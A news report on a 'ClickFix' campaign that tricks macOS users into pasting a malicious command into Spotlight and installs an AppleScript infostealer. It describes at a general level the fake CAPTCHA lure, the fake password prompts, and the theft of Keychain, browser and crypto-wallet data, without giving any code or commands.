A new cyberattack campaign targeting macOS users has emerged as a serious global security concern, with attackers deploying an AppleScript-based infostealer through a social engineering technique known as “ClickFix.” The malware is designed to steal highly sensitive user data, including browser passwords, session cookies, cryptocurrency wallet information, and data from hundreds of browser extensions.
According to cybersecurity researchers, the campaign has been active since at least last month, with new incidents continuing to surface in recent weeks. The attack appears to be primarily focused on users in Asia, particularly those working in the financial sector, suggesting a coordinated and financially motivated cyber operation.
The most dangerous aspect of this attack is its method of deception. Victims are first redirected to fake CAPTCHA verification pages that closely resemble legitimate websites. Users are then instructed to copy a “verification code” and paste it into macOS Spotlight. In reality, this code is a malicious command that silently executes a “curl” request, downloading malware from an attacker-controlled server and activating it on the system.
FCRF Academy Launches Premier Anti-Money Laundering Certification Program
Once executed, the malware collects system information such as usernames and creates hidden directories to store stolen data. This information is then transmitted to remote command-and-control servers operated by the attackers.
One of the most alarming elements of the campaign is its credential-harvesting technique. The malware displays a fake macOS security dialog box that closely mimics genuine Apple system alerts, using authentic system icons to appear legitimate. The dialog repeatedly reappears until the user enters their password, effectively coercing victims into revealing their system credentials.
Once entered, the password is immediately captured and sent to the attackers. In addition, the malware extracts data from macOS Keychain, including saved passwords, Wi-Fi credentials, secure notes, and encryption keys.
The attack is not limited to system-level credentials. It also targets all major Chromium-based browsers, including Google Chrome, Microsoft Edge, Brave, Opera, and others. From these browsers, attackers steal session tokens, cookies, autofill data, saved passwords, and even credit card information.
Furthermore, more than 200 browser extensions are affected, including major cryptocurrency wallets such as MetaMask, Phantom, Trust Wallet, and Coinbase Wallet. Popular password managers like 1Password, Bitwarden, Dashlane, and LastPass are also targeted, along with authentication tools such as Authy and Google Authenticator extensions.
Security experts note that the malware is designed to exploit user trust and momentary mistakes. Once inside a system, it operates silently and continuously exfiltrates data without the victim’s awareness.
Apple has introduced several security enhancements in recent macOS versions, including warnings when users attempt to paste potentially harmful commands into system terminals. However, users running outdated systems or those who ignore security warnings remain vulnerable.
Experts emphasize that this attack highlights a major shift in cyber threats, where attackers are increasingly relying on human manipulation rather than technical vulnerabilities. Fake interfaces, social engineering tactics, and deceptive system prompts have become key tools in modern cybercrime.
Overall, the ClickFix campaign underscores a growing trend in cybersecurity threats, where digital deception is as dangerous as malware itself. As cyberattacks become more sophisticated, user awareness and cautious behavior are becoming just as important as technical defenses.
